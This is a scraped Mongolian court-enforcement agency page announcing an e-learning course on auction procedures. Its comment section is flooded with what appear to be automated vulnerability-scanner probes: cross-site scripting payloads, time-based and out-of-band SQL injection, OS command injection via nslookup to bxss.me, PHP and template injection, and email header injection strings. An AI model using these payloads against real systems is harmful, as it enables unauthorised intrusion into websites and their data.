ШҮҮХИЙН ШИЙДВЭР ГҮЙЦЭТГЭХ ЕРӨНХИЙ ГАЗАР

ШИЙДВЭР ГҮЙЦЭТГЭХ АЛБА

“Дуудлага худалдааны эрхлэн хөтлөлт”-ийн цахим сургалтын хичээл.
Нийтлэгдсэн 2019-09-13 12:16:26 | Үзсэн: 1

Шүүхийн шийдвэр гүйцэтгэх тухай хуулийн зүйл, заалтыг нэг мөр ойлголтоор хэрэгжүүлэх, ахлах шийдвэр гүйцэтгэгч болон шийдвэр гүйцэтгэгчдийг мэргэжлийн удирдлагаар хангах чиглэлээр Шийдвэр гүйцэтгэх албанаас “Дуудлага худалдааны эрхлэн хөтлөлт”-ийн цахим сургалтын хичээлийг боловсруулж, үйл ажиллагаанд ашиглуулж байна.
Сургалтын гарын авлагад дуудлага худалдааны эрхлэн хөтлөлтийн цахим хичээлээс гадна шинээр батлагдсан хууль тогтоомжинд нийцүүлэн баталсан эрх зүйн актууд, шийдвэр гүйцэтгэх ажиллагааны явцад үйлдэгдэх тогтоолын загвар, тодорхой төрлийн шийдвэр гүйцэтгэх ажиллагааны сургалтын хичээлүүд, тэжээн тэтгэх үүрэг, зарим төрлийн гэмт хэргийн хохирогчид нөхөн төлбөр олгох ажиллагаа, гүйцэтгэх баримт бичгийн цахим сангийн мэдээлэл боловсруулах аргачилсан зааврыг тус тус багтаасан бөгөөд энэхүү гарын авлага нь ахлах шийдвэр гүйцэтгэгч, шийдвэр гүйцэтгэгчдийн эрх зүйн мэдлэгийг дээшлүүлэхэд чиглэгдсэн байна.

2019-09-13 12:16:26
Сэтгэгдэл бичих

Нэр :
Таны и-мэйл :
Сэтгэгдэл :
Энд дарж зурган кодыг шинэчилнэ үү
Нийт сэтгэгдэл
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20N8J0M[!+!]
2019-09-13 12:16:26
qynfxekc :
20xPIBt ymwz(9135)
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20}body{acu:Expre/**/SSion(ymwz(9483))}
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
[url=http://www.vulnweb.com][/url]
2019-09-13 12:16:26
qynfxekc :
2019-09-13 12:16:26
qynfxekc :
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
2019-09-13 12:16:26
qynfxekc :
20<ScRiPt>ymwz(9003)</sCripT>
2019-09-13 12:16:26
qynfxekc :
20\u003CScRiPt\ymwz(9392)\u003C/sCripT\u003E
2019-09-13 12:16:26
qynfxekc :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6D%77%7A%289369%29%3C%2F%73%43%72%69%70%54%3E
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20
2019-09-13 12:16:26
qynfxekc :
20ymwz(9605)
2019-09-13 12:16:26
qynfxekc :
20ymwz(9732)
2019-09-13 12:16:26
qynfxekc :
20ymwz(9232)
2019-09-13 12:16:26
qynfxekc :
20JI8BU[!+!]
2019-09-13 12:16:26
qynfxekc :
20ymwz(9095)
2019-09-13 12:16:26
qynfxekc :
{{10000265*10000084}}
2019-09-13 12:16:26
qynfxekc :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-09-13 12:16:26
qynfxekc :
acux4797z1z2abcxuca4797
2019-09-13 12:16:26
qynfxekc :
acu5349<s1﹥s2ʺs3ʹuca5349
2019-09-13 12:16:26
qynfxekc :
209725059
2019-09-13 12:16:26
qynfxekc :
'"()&%ymwz(9248)
2019-09-13 12:16:26
qynfxekc :
20'"()&%ymwz(9849)
2019-09-13 12:16:26
ehkfnkpn :
1acuYb7s0McKE2
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
208KKAR[!+!]
2019-09-13 12:16:26
ixjeesqm :
20jqBrU aLdV(9310)
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20}body{acu:Expre/**/SSion(aLdV(9568))}
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
[url=http://www.vulnweb.com][/url]
2019-09-13 12:16:26
ixjeesqm :
2019-09-13 12:16:26
ixjeesqm :
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
2019-09-13 12:16:26
ixjeesqm :
20<ScRiPt>aLdV(9133)</sCripT>
2019-09-13 12:16:26
ixjeesqm :
20\u003CScRiPt\aLdV(9779)\u003C/sCripT\u003E
2019-09-13 12:16:26
ixjeesqm :
%32%30%3C%53%63%52%69%50%74%20%3E%61%4C%64%56%289029%29%3C%2F%73%43%72%69%70%54%3E
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20
2019-09-13 12:16:26
ixjeesqm :
20aLdV(9929)
2019-09-13 12:16:26
ixjeesqm :
20aLdV(9381)
2019-09-13 12:16:26
ixjeesqm :
20aLdV(9949)
2019-09-13 12:16:26
ixjeesqm :
202T4D4[!+!]
2019-09-13 12:16:26
ixjeesqm :
20aLdV(9648)
2019-09-13 12:16:26
ixjeesqm :
{{9999598*10000395}}
2019-09-13 12:16:26
ixjeesqm :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-09-13 12:16:26
qkbvxvsv :
2019-09-13 12:16:26
ixjeesqm :
acux8111z1z2abcxuca8111
2019-09-13 12:16:26
ixjeesqm :
acu10213<s1﹥s2ʺs3ʹuca10213
2019-09-13 12:16:26
ixjeesqm :
209596819
2019-09-13 12:16:26
ixjeesqm :
'"()&%aLdV(9809)
2019-09-13 12:16:26
ixjeesqm :
20'"()&%aLdV(9193)
2019-09-13 12:16:26
yriqvvoo :
''""
2019-09-13 12:16:26
qyvcgsnn :
news/.
2019-09-13 12:16:26
yriqvvoo :
JyI=
2019-09-13 12:16:26
yriqvvoo :
@@5Wnxn
2019-09-13 12:16:26
ithktmrx :
/www.vulnweb.com
2019-09-13 12:16:26
tovksqxg :
197'
2019-09-13 12:16:26
tovksqxg :
20';copy (select '') to program 'nslookup dns.sqli.\013405.85-888.85.d9cab.\1.bxss.me
2019-09-13 12:16:26
tovksqxg :
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-886.85.d9cab.1.bxss'||'.me')||'
2019-09-13 12:16:26
tovksqxg :
20;copy (select '') to program 'nslookup dns.sqli.\013405.85-887.85.d9cab.\1.bxss.me'
2019-09-13 12:16:26
tovksqxg :
20||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-885.85.d9cab.1.bxss'||'.me')
2019-09-13 12:16:26
tovksqxg :
lgNdLVfd');select pg_sleep(9); --
2019-09-13 12:16:26
tovksqxg :
urprzqUf'));select pg_sleep(3); --
2019-09-13 12:16:26
pbwpqcuj :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-09-13 12:16:26
tovksqxg :
PVLhKBKI';select pg_sleep(9); --
2019-09-13 12:16:26
tovksqxg :
-1);select pg_sleep(9); --
2019-09-13 12:16:26
tovksqxg :
-1));select pg_sleep(9); --
2019-09-13 12:16:26
tovksqxg :
28XlaZMq'; waitfor delay '0:0:6' --
2019-09-13 12:16:26
tovksqxg :
-1;select pg_sleep(9); --
2019-09-13 12:16:26
qyvcgsnn :
news
2019-09-13 12:16:26
tovksqxg :
1 waitfor delay '0:0:6' --
2019-09-13 12:16:26
tovksqxg :
-1); waitfor delay '0:0:6' --
2019-09-13 12:16:26
tovksqxg :
-1; waitfor delay '0:0:6' --
2019-09-13 12:16:26
bohnilpb :
${@print(md5(acunetix_wvs_security_test))}\
2019-09-13 12:16:26
bohnilpb :
";print(md5(acunetix_wvs_security_test));$a="
2019-09-13 12:16:26
bohnilpb :
${@print(md5(acunetix_wvs_security_test))}
2019-09-13 12:16:26
tovksqxg :
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2019-09-13 12:16:26
bohnilpb :
';print(md5(acunetix_wvs_security_test));$a='
2019-09-13 12:16:26
tovksqxg :
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
2019-09-13 12:16:26
bohnilpb :
;print(md5(acunetix_wvs_security_test));
2019-09-13 12:16:26
tovksqxg :
-1 OR 2+289-289-1=0+0+0+1
2019-09-13 12:16:26
tovksqxg :
-1 OR 3+289-289-1=0+0+0+1
2019-09-13 12:16:26
qyxfkfop :
http://hitAjuiAKkvQr.bxss.me/
2019-09-13 12:16:26
tovksqxg :
-1 OR 3+555-555-1=0+0+0+1 --
2019-09-13 12:16:26
tovksqxg :
1*1*1*20
2019-09-13 12:16:26
tovksqxg :
-1 OR 2+555-555-1=0+0+0+1 --
2019-09-13 12:16:26
tovksqxg :
1*1*1*20
2019-09-13 12:16:26
tovksqxg :
1*1*1*20
2019-09-13 12:16:26
tovksqxg :
1*1*1*20
2019-09-13 12:16:26
tovksqxg :
2cVPNEjw
2019-09-13 12:16:26
krcppshy :
http://testasp.vulnweb.com/t/xss.html?%00.jpg
2019-09-13 12:16:26
bvofragj :
'"()
2019-09-13 12:16:26
psaudpbg :
^(#$!@#$)(()))******
2019-09-13 12:16:26
psaudpbg :
!(()&&!|*|*|
2019-09-13 12:16:26
yeocmdmi :
testasp.vulnweb.com
2019-09-13 12:16:26
yeocmdmi :
http://testasp.vulnweb.com/t/fit.txt?.jpg
2019-09-13 12:16:26
gkrcwwfj :
20&n982166=v902657
2019-09-13 12:16:26
yeocmdmi :
Http://testasp.vulnweb.com/t/fit.txt
2019-09-13 12:16:26
yeocmdmi :
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-09-13 12:16:26
frfgynis :
${9999340+9999439}
2019-09-13 12:16:26
igwvqukj :
to@example.com> bcc:013405.85-869.85.d9cab.1@bxss.me
2019-09-13 12:16:26
igwvqukj :
20 bcc:013405.85-867.85.d9cab.1@bxss.me
2019-09-13 12:16:26
hwrfulrn :
&nslookup dns.ce.\013405.85-865.85.d9cab.\1.bxss.me&'\"`0&nslookup dns.ce.\013405.85-865.85.d9cab.\1.bxss.me&`'
2019-09-13 12:16:26
hwrfulrn :
$(nslookup dns.ce.\013405.85-857.85.d9cab.\1.bxss.me)
2019-09-13 12:16:26
gwgicgsp :
wlkg0ePa
2019-09-13 12:16:26
hwrfulrn :
set|set&set
2019-09-13 12:16:26
vrpyscho :
"+response.write(9374332*9300298)+"
2019-09-13 12:16:26
vrpyscho :
response.write(9374332*9300298)
2019-09-13 12:16:26
vrpyscho :
'+response.write(9374332*9300298)+'
2019-09-13 12:16:26
igpomrme :
20'>">
2019-09-13 12:16:26
igpomrme :
20
2019-09-13 12:16:26
Нийслэлийн шийдвэр гүйцэтгэх газар
 • Утас :
  70001480
 • Факс :
  70001482
 • Имэйл :
  shgg@cd.gov.mn
 • Манай хаяг :

  Улаанбаатар хот, Сүхбаатар дүүрэг, 10-р хороо, Цагдаагийн гудамж ШШГЕГ-ын хоёрдугаар байр